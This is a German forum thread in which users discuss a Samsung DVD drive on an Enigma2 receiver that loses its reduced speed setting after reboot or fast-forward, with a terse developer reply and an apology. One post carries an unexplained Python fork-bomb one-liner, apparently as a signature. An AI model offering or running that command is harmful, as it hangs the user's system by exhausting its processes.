DVD Speed bleibt nicht gespeichert

• DVD Speed bleibt nicht gespeichert

wenn ich die speed vom DVD LW (Samsung) umstelle, stellt es sich
      nach einem neustart wieder auf volle speed zurück und ist wieder laut :(
      es ist sogar so, wenn man DVD schaut und man geht auf schnellvorlauf, "vergisst er die voreinstellung z.b. 4fach speed und bleibt gleich auf max. speed.
      bin für jede hilfe dankbar
    • Also leute das ist kein bug wenn ihr spult wird das natürlich zurückgenommen wie soll spulen funktionieren wenn das laufwerk eingebremst wird?Nach einem reboot ist das auch zurückgenommen weil das damals gewünscht worden ist.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • schön ist vieles bei meinem dvd laufwerk und der 800er brauch ich diese option garnicht da das laufwerk das selbst managed es ist nicht zu hören beim dvd gucken :D :D

PS
      evtl hilft ja ein firmware update des laufwerks falls es das gibt
    • Original von kati910
      Also leute das ist kein bug wenn ihr spult wird das natürlich zurückgenommen wie soll spulen funktionieren wenn das laufwerk eingebremst wird?Nach einem reboot ist das auch zurückgenommen weil das damals gewünscht worden ist.

das es während des schnellvorlaufs hochdreht ist klar, warum es aber dann bei "play" nicht wieder leiser wird nicht, darum geht es. wo liegt weiters der sinn, dass es nach einem einschalten wieder "schnell" läuft....
    • Wenn wir schon über sinn und unsinn reden müsste dir eigentlich beim lesen deines letzten beitrags auffallen das ich zitiere mal "das es während des schnellvorlaufs hochdreht ist klar, warum es aber dann bei "play" nicht wieder leiser wird " das es ganz klar um einen eingriff in den enigma2 source geht bzw in ein plugin von dmm da wir aber am source nichts ändern und wir cvs kompatibel bleiben musste dich schon bei dmm beschweren oder dir ein gescheites laufwerk kaufen und wenn du es beim booten willst kannste freundlich danach fragen mich kotzt diese erwartungshaltung an ich mach das alles aus hobby und ich muss auch niemanden den sinn erklären der nicht mal in der lage ist ein sysctl befehl zu ergoogeln und in die conf einzutragen.Also merkt euch der ton macht die musik 8)
    • das wichtigste, wenn ich mich im ton vergriffen habe bzw.dich (in)direkt angegriffen habe möcht ich mich aufrichtig dafür entschuldigen.das war bzw. ist sicher nicht mein ziel! wir ist sehr wohl bewußt mit welchem zeitaufwand das ganze hier verbunden ist, und bin froh und dankbar das es solche wie dich gibt. denn sonst hätten solche wie ich, und ich bin bekennender neuling auf der 8k bzw. linux nicht viele alternativen.

bzgl meinem dvd problem. ich habe ein samsung SN S083c. firmware ist auf den letzten stand, habe ich heute geprüft. mit der tatsache, dass das LW nach einem schnellvorlauf eben im "speed" modus bleibt, kann ich leben. wenn es aber eine möglichkeit gibt die reduzierte speed auch nach einem "deep-standby" beizubehalten wäre das eben echt genial...
      eventuell gibt es ja eine möglichkeit, welche ich auch als rookie hinbekomme.

schon jetzt danke und nochmals sorry!
    • nachdem ich durch das netzwerkproblem wieder auf 2.8.2 gehen mußte, habe ich natürlich auch wieder mein "speed problem" ;)
      gibt es unter 2.8.2 eine alternativ möglichkeit die speed fix einzustellen??
      schon jetzt danke!!